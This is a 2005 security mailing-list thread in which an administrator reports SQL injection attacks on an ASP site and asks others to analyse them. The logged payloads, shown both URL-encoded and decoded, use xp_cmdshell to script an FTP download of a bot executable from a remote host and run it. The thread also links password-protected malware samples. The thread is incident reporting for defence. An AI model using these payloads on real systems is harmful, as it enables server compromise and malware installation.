Security Incidents mailing list archives

Re: SQL injection ... another attack

From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 20 Jan 2005 10:57:12 -0800 (PST)

I think the real issue here is that the SQL Injection
worked....


--- gaurav kumar <gkverma () gmail com> wrote:

my VirusScan (network associates) detected it as
W32/Sdbot.worm.gen


On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
<mducharme () cybergeneration com> wrote:


Hi to the list

today we received the same SQL injection attack
on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir

%systemroot%\system32\Macromed\lolx\';

exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka

r0ckpaul >>

%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe

%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v

-s:%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell 'del

%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell

'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--


The lol.exe file can be found in this archive for

inspection :

http://www.cybergeneration.com/security/2005.01.19/lol.zip

zip pass is das978tewa234

Norton with definitions of 12 jan. doesnt find

anything

suspicious.

I'm interested if someone do an analysis on this

file.


Have a nice day

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

----- Original Message -----
From: "Maxime Ducharme"

<mducharme () cybergeneration com>

To: <full-disclosure () lists netsys com>; "General

DShield Discussion List"

<list () lists dshield org>;

<incidents () securityfocus com>

Sent: Wednesday, January 05, 2005 12:22 PM
Subject: SQL injection worm ?


Hi list,
    we receveid a particular SQL injection

attack

on one of our site.

Attack looks like :
2005-01-05 14:39:20 24.164.202.24 - W3SVCX

SRVNAME x.x.x.x 80 GET

/Nouvelles.asp

id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68

%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7

8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op

en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%

5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%

68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%

5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..

%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2

5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C

system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7

8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5

Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%

78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo

t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45

%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%

5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6

3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car

cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin

e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570

HTTP/1.1

attacked.web.site.com - - -

HTTP request contains only 2 fields (beside HTTP

method) :

Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site).

Decoded SQL injection looks like :
exec MASTER..xp_cmdshell 'mkdir

%systemroot%\system32\Macromed\lolx\';

exec MASTER..xp_cmdshell 'echo open y.y.y.y 21

%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk

hahaowned >>

%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe

%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v

-s:%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell 'del

%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell

'%systemroot%\system32\Macromed\lolx\arcdlrde.exe


y.y.y.y is a foreign IP in Europe which host FTP

an WWW server.

I sent a notice this this site sysadmin about

the situation.


I have been able to connect to this FTP with the

account hahajk/hahaowned

(which do not seem legit to me ...) and download

suspicious files.

I mirrored them here :

http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip

zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have

also been advised.


I know rbot.exe is known to be Randex worm, but

i'd like that have

some other results / analysis.

I also found a "test.asp" file which contains

the Spybot worm.


Weird thing is, I searched for this hosts's

activity on every server

and every firewall we run, and I only see 1 TCP

connection which

is the prepared SQL injections attack, nothing

else.


Anybody see similar activity ?

I'm asking since I want to know if we are

targeted by someone of

by a worm like Santy of use search engines to

find vulnerable

ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau



=====
------------------------------------------
Harlan Carvey, CISSP
"Windows Forensics and Incident Recovery"
http://www.windows-ir.com
http://windowsir.blogspot.com
------------------------------------------

Current thread:

SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Teodor Cimpoesu (Jan 20)
- Re: SQL injection ... another attack gaurav kumar (Jan 20)
  - Re: SQL injection ... another attack Harlan Carvey (Jan 20)
    - Re: SQL injection ... another attack Maxime Ducharme (Jan 20)